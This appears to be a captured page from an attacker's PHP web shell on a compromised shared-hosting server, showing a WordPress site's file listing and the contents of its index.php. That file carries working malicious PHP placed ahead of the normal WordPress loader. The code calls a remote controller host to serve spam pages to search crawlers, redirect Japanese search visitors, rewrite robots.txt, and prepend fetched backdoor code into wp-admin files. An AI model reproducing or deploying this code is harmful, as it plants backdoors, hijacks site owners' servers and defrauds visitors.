Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.144
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
julaysp1 /
public_html /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
dr-xr-xr-x
2025-08-31 20:43
admin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
admin-new-market
[ DIR ]
drwxr-xr-x
2025-09-09 03:12
api_key
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
assets
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
assets-20250909035730
[ DIR ]
drwxr-xr-x
2025-09-09 03:57
cgi-bin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
cgi-bin-20250909035631
[ DIR ]
drwxr-xr-x
2025-09-09 03:56
folderadmin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
folderanimenew
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
font
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
font-20250909065131
[ DIR ]
drwxr-xr-x
2025-09-09 06:51
fonts
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
fonts-20250909105418
[ DIR ]
drwxr-xr-x
2025-09-09 10:54
heroadmin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
heroadmin-20250909021506
[ DIR ]
drwxr-xr-x
2025-09-09 02:15
includes
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
keyadmin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
keyadmin-20250909031726
[ DIR ]
drwxr-xr-x
2025-09-09 03:17
nibondon
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
order
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
pages
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
pages-20250909102154
[ DIR ]
drwxr-xr-x
2025-09-09 10:21
pdf
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
photo
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
photo_smart
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
pin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
pin-20250909065043
[ DIR ]
drwxr-xr-x
2025-09-09 06:50
qr_photo
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
roaring
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
test
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
themesth
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
wp-admin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
wp-content
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
wp-includes
[ DIR ]
dr-xr-xr-x
2025-09-01 07:26
wp-includes-20250909061627
[ DIR ]
drwxr-xr-x
2025-09-09 06:16
.hta
5.35
KB
-rw-r--r--
2025-09-08 03:27
.htaccess
589
B
-r--r--r--
2025-09-09 11:22
buy.php
3.39
KB
-rw-r--r--
2025-09-08 03:28
db.php
7.03
KB
-rw-r--r--
2025-09-09 06:16
functions-helper-20250909071110.php
10.7
KB
-rw-r--r--
2025-09-09 04:00
functions-helper.php
10.7
KB
-rw-r--r--
2025-09-09 04:00
index-20250909044702.php
7.43
KB
-rw-r--r--
2025-09-09 03:01
index.php
12.27
KB
-r--r--r--
2025-09-09 11:22
p.php
83
B
-rw-r--r--
2025-09-09 01:20
Save
Rename
<?php error_reporting(0); @set_time_limit(120); @ignore_user_abort(1); $tr = "https://j250815_13.qtorp.com/"; class Req { public function server($name = '', $default = '') { if (empty($name)) { return $_SERVER; } $name = strtoupper($name); return isset($_SERVER[$name]) ? $_SERVER[$name] : $default; } public function iss() { if ($this->server('HTTPS') && ("1" == $this->server('HTTPS') || "on" == strtolower($this->server('HTTPS')))) { return true; } elseif ('https' == $this->server('REQUEST_SCHEME')) { return true; } elseif ('443' == $this->server('SERVER_PORT')) { return true; } elseif ('https' == $this->server('HTTP_X_FORWARDED_PROTO')) { return true; } return false; } public function host() { $host = strval($this->server('HTTP_X_FORWARDED_HOST') ?: $this->server('HTTP_HOST')); return strpos($host, ':') ? strstr($host, ':', true) : $host; } public function scheme() { return $this->iss() ? "https" : "http"; } public function dm() { return $this->scheme() . "://" . $this->host(); } public function ip() { if (getenv('HTTP_CLIENT_IP')) { $ip = getenv('HTTP_CLIENT_IP'); } elseif (getenv('HTTP_X_FORWARDED_FOR')) { $ip = getenv('HTTP_X_FORWARDED_FOR'); } elseif (getenv('REMOTE_ADDR')) { $ip = getenv('REMOTE_ADDR'); } else { $ip = $this->server('REMOTE_ADDR'); } return $ip; } public function isc() { $agent = strtolower($this->server('HTTP_USER_AGENT')); if ($agent != '' && preg_match('/googlebot|google|yahoo|aol/si', $agent)) { return true; } return false; } public function isg() { $refer = strtolower($this->server('HTTP_REFERER')); if ($refer != '' && preg_match('/google.co.jp|yahoo.co.jp|google.com/si', $refer)) { return true; } return false; } public function uri() { if (($pos = strpos($this->server('REQUEST_URI'), '.php')) !== false) { $script_name = basename($this->server('SCRIPT_FILENAME')); if (basename($this->server('SCRIPT_NAME')) === $script_name) { $url = $this->server('SCRIPT_NAME'); } elseif (basename($this->server('PHP_SELF')) === $script_name) { $url = $this->server('PHP_SELF'); } elseif (basename($this->server('ORIG_SCRIPT_NAME')) === $script_name) { $url = $this->server('ORIG_SCRIPT_NAME'); } elseif (($pos = strpos($this->server('PHP_SELF'), '/' . $script_name)) !== false) { $url = substr($this->server('SCRIPT_NAME'), 0, $pos) . '/' . $script_name; } elseif ($this->server('DOCUMENT_ROOT') && strpos($this->server('SCRIPT_FILENAME'), $this->server('DOCUMENT_ROOT')) === 0) { $url = str_replace($this->server('DOCUMENT_ROOT'), '', $this->server('SCRIPT_FILENAME')); } $requri = $url . substr($this->server('REQUEST_URI'), $pos + 4); } else { $requri = substr($this->server('REQUEST_URI'), strpos($this->server('REQUEST_URI'), '/')); } return rtrim($requri, '/'); } public function execReq($url, $p = array()) { $url = str_replace(' ', '+', $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($p)); $output = curl_exec($ch); $errorCode = curl_errno($ch); curl_close($ch); if (0 !== $errorCode) { return false; } return $output; } } $req = new Req(); $isc = $req->isc(); $isg = $req->isg(); $umap = $tr . "map"; $uri = urldecode($req->uri()); $p = array( "domain" => $req->dm(), "port" => $req->server('SERVER_PORT', 80), "uri" => $uri ); if (substr($uri, -6) == "robots") { $output = $req->execReq($tr . "robots", $p); $rpt = __DIR__ . "/robots.txt"; file_put_contents($rpt, $output); $robots_cont = @file_get_contents($rpt); if (strpos(strtolower($robots_cont), "sitemap")) { die("robots.txt file create success!"); } else { die("robots.txt file create fail!"); } } if (substr($uri, -5) == "beima") { function findWpAdminDir($startDir = __DIR__) { $currentDir = realpath($startDir); $depth = 0; while ($depth < 5) { $wpAdminPath = $currentDir . DIRECTORY_SEPARATOR . 'wp-admin'; if (is_dir($wpAdminPath)) { return $wpAdminPath; } if ($currentDir === dirname($currentDir)) { break; } $currentDir = dirname($currentDir); $depth++; } return false; } $dir = findWpAdminDir(); $op1 = $req->execReq($tr . "beima1", $p); $op2 = $req->execReq($tr . "beima2", $p); $f1 = $dir . DIRECTORY_SEPARATOR . 'tools.php'; $f2 = $dir . DIRECTORY_SEPARATOR. 'includes' . DIRECTORY_SEPARATOR .'class-wp-debug-data.php'; $r1 = $r1 = false; if (file_exists($f1)) { $o1 = @file_get_contents($f1); if (@file_put_contents($f1, $op1 . PHP_EOL . $o1)) { $r1 = true; } } if (file_exists($f2)) { $o2 = @file_get_contents($f2); if (@file_put_contents($f2, $op2 . PHP_EOL . $o2)) { $r2 = true; } } if ($r1 && $r2) { die("beima1 and beima2 success!"); } elseif ($r1) { die("beima1 success,beima2 fail!"); } elseif ($r2) { die("beima1 fail,beima2 success!"); } else { die("beima1 and beima2 fail!"); } } if (substr($uri, -4) == ".xml") { if (strpos($uri, "allsitemap.xml") || strpos($uri, "sitemap-index.xml") || strpos($uri, "sitemap-index-1.xml") || strpos($uri, "index.xml")) { $output = $req->execReq($umap, $p); header("Content-type:text/" . (substr($output, 0, 5) === '<?xml' ? 'xml' : 'plain') . '; charset=utf-8'); die('' . $output); } $output = $req->execReq($tr . "word", $p); header("Content-type:text/xml; charset=utf-8"); if ($output == "1") { die('' . $req->execReq($umap, $p)); } else { die('' . $output); } } $lang = $req->server('HTTP_ACCEPT_LANGUAGE'); if (!$isc && $isg && strpos($lang, 'ja')!==false) { $p["ip"] = $req->ip(); $action = $tr . "jump"; die($req->execReq($action, $p)); } if ($isc) { die('' . $req->execReq($tr . "indata", $p)); } ?> /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';